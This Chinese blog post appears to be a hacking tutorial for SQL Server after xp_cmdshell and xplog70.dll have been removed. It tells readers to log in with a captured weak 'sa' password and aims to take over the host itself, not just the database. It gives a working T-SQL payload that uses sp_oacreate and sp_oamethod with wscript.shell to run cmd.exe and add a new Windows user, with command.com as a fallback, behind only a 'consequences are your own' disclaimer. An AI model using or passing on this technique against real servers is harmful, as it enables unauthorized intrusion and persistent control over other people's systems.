當xplog70.dll文件被刪除後

穩萊

當xplog70.dll文件被刪除後

起初,筆者也是大嘆可惜的,因為如果只是xp_cmdshell被刪除還好說,可是如果連xplog70.dll也被刪除了,這該如何是好?
狂查資料!
暈啊,怎麼到處都沒有說的呢?難道沒有解決辦法嗎?
於是,只好自己想辦法。可是從那裏下手呢?想來想去,還是從sql server本身著手看看。
打開查詢分析器。

用你捕獲的sa弱口令進入目標機器,當然我們的最終目標是操縱主機而不僅僅是操縱人家的數據庫哦 :)
省略思考過程若干。。。。。。(腦細胞累死一大批)
突然,嘎嘎。。。怎么有這么兩個存儲過程啊sp_oacreate和sp_oamethod,再查查他們的作用和語法,嘿嘿。。。皇天不負苦心人啊。
交待大家怎么用好了,具體的描述,我感覺自己寫不出來,沒法子,從小討厭作文。
只要你連接上目標機,并發現這兩個存儲過程沒刪除(99%都沒刪除,看來管理員們都不了解這些存儲過程的強大功能啊),那么利用您的查詢分析器所有的sa弱口令機器都可以控制咯!
比如我給他添加一個用戶!
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user gchn aaa /add'--

呵呵,如果您發現,cmd.exe都被刪掉了,試試command命令,如果這也被刪掉了,那這個管理員太變態了。
ok,鄭重聲明,如果您用來搞破壞,那后果自負哦。同時也不是我希望的,我只是希望大家把平時一點心得拿出來交流,那我們的水平會提高很快啊。
 

 給當前日誌評分:
Loading Vote
正在讀取評分資料...


文章來自: Tank部落格
引用通告: 查看所有引用 | 我要引用此文章
Tags: xplog70.dll
相關日誌:

評論: 0 | 引用: 0 | 查看次數: -
發表評論
暱 稱:
密 碼: 遊客發言不需要密碼.
內 容:
驗證碼: 驗證碼
選 項:
雖然發表評論不用註冊,但是為了保護您的發言權,建議您註冊帳號.